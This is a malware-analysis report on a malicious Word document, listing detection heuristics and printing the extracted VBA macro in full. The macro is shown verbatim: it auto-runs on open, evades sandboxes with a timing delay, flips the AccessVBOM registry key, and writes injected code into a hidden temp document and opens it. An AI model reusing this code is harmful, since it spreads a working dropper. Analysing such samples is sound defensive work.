Malware Insights
The sample contains VBA macros that execute upon opening the document, as indicated by the 'documeNt_opEn' subroutine. The macro constructs a string 'WScript.Shell' to create a Windows Script Host object, which is then used to write a value to the registry key HKCU\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM. This action likely aims to enable programmatic access to the VBA object model, potentially to facilitate further malicious actions or persistence. The macro also attempts to save the document and then opens a new document, suggesting a downloader or dropper functionality.
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger() -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsl = CreateObject(strng) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub documeNt_opEn() -
External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKSDocument contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: mailto:m.madelkhanov@mfa.kz
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Document hyperlink
- http://schemas.microsoft.com/office/drawing/2014/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexDocument hyperlink
- http://schemas.openxmlformats.org/markup-compatibility/2006Document hyperlink
- http://schemas.microsoft.com/office/drawing/2016/inkDocument hyperlink
- http://schemas.microsoft.com/office/drawing/2017/model3dDocument hyperlink
- http://schemas.microsoft.com/office/2019/extlstDocument hyperlink
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsDocument hyperlink
- http://schemas.openxmlformats.org/officeDocument/2006/mathDocument hyperlink
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingDocument hyperlink
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingDocument hyperlink
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainDocument hyperlink
- http://schemas.microsoft.com/office/word/2010/wordmlDocument hyperlink
- http://schemas.microsoft.com/office/word/2012/wordmlDocument hyperlink
- http://schemas.microsoft.com/office/word/2018/wordml/cexDocument hyperlink
- http://schemas.microsoft.com/office/word/2016/wordml/cidDocument hyperlink
- http://schemas.microsoft.com/office/word/2018/wordmlDocument hyperlink
- http://schemas.microsoft.com/office/word/2023/wordml/word16duDocument hyperlink
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashDocument hyperlink
- http://schemas.microsoft.com/office/word/2015/wordml/symexDocument hyperlink
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupDocument hyperlink
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkDocument hyperlink
- http://schemas.microsoft.com/office/word/2006/wordmlDocument hyperlink
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeDocument hyperlink
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1974 bytes |
SHA-256: cab6f078d1ea32030ccaca88a921f8f4c4080728d12ffb69057d8383fa7fa431 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
Set doc2 = objApp.Documents.Open(namedoc)
doc2.Save
doc2.Close
End Function
Sub verydanger()
strng = "WSc" & "ript.She"
strng = strng & "ll"
Set wsl = CreateObject(strng)
wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
On Error Resume Next
ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
ActiveDocument.Shapes(i).Delete
Next i
ActiveDocument.Save
sss = Now()
While Now < sss + TimeValue("00:00:20")
DoEvents
Wend
If Now() - sss < TimeValue("00:00:15") Then Exit Sub
verydanger
Set objApp = CreateObject("Word.Application")
objApp.Visible = False
Set doc = objApp.Documents.Add
For Each vars In ActiveDocument.Variables
doc.Variables.Add vars.Name & "ergegdr", vars
i = i + 1
Next
doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
doc.Close
rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
objApp.Quit False
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 22016 bytes |
SHA-256: e917622d343402cf0f558450f25e45658228bdeef0ff4e56f2dea08140afbc1b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.